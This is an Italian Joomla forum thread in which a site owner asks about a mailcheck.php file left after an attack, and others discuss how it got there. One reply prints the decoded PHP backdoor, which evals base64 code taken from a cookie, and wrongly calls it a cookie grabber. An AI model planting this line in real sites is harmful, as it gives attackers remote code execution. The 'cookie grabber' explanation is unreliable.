Joomla.it Forum
Non solo Joomla... => Sicurezza => : tonyan 23 Mar 2010, 23:54:05
-
dopo aver subito un attacco ho notato nella root del mio sito un file chiamato mailcheck.php con all'interno questo codice
-----------------
<?php eval(base64_decode
cut
?>-----------------
sapete di cosa si tratta? e sopratttutto com'è arrivato li?
-
Allora,..
si chiama cookie grabber,ovvero ti "ruba" i cookies.
I coockies contengono spesso i dati di autenticazione e la sessione quindi sostituendoli ai propri e "presentandosi" al sito in questione permettono l'accesso coi privilegi di chi li possiede.
Questo quello che vuole fare il codice:
if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}
..ora io non so chi sia il tuo visitatore ma sicuramente o è una macchina o c'è qualcosina che nn va, joomla non ha un coockie PHPSESSIID ... ma PHPSESSID e quindi dubito funzioni, e comunque sia non dovrebbe essere così semplice visto che sei legato oltre che alla sessione a un token.
... un'altro che avrà visto qualche film di matrix ...
M.
-
Quello che non capisco è come lo abbiano messo. Non ho configurato l'accesso ftp.
-
non serve l'ftp basta non aver aggiornato joomla o uno dei suoi addons che installi all'ultima versione, o in ultima possibilità, è un problema del server.
M.
ps. quando hai del codice strano che non capisci, molte volte è codificato in base64.
Basta che cerchi con google un "decode base64" e trovi comodissimi tool che eseguono tutto in sandbox evitandoti problemi locali e ti restituiscono il codice in chiaro.
-
spero che l'attacco che ho subito derivi dal fatto che non avevo l'ultima versione di joomla installata.
Però anche se la vulnerabilità è del server o del fatto che non ho aggiornato joomla all'ultima versione non capisco come possano crearmi un file nella root senza accesso ftp. Posso capire che mi modifichino index,php e index2.php e alcuni js ... ... ...
-
spero che l'attacco che ho subito derivi dal fatto che non avevo l'ultima versione di joomla installata.
----------------------------------------------------------------
...smetti di sperare... direi che è questo il motivo.
Posso capire che mi modifichino index,php...
non capisco come possano crearmi un file nella root senza accesso ftp
-------------------------------------------
queste due cose che dici contrastano, se modificano vuol dire che hanno o un accesso fisico o sfruttano un funzionamento non previsto.
...comunque in qualsiasi caso modificano.
Adesso, non sto qui a spiegarti il modo, però se invece di quel codice che hai visto fosse stato il codice di un modulino di upload file? sono in ftp?
M.
come fanno è più che semplice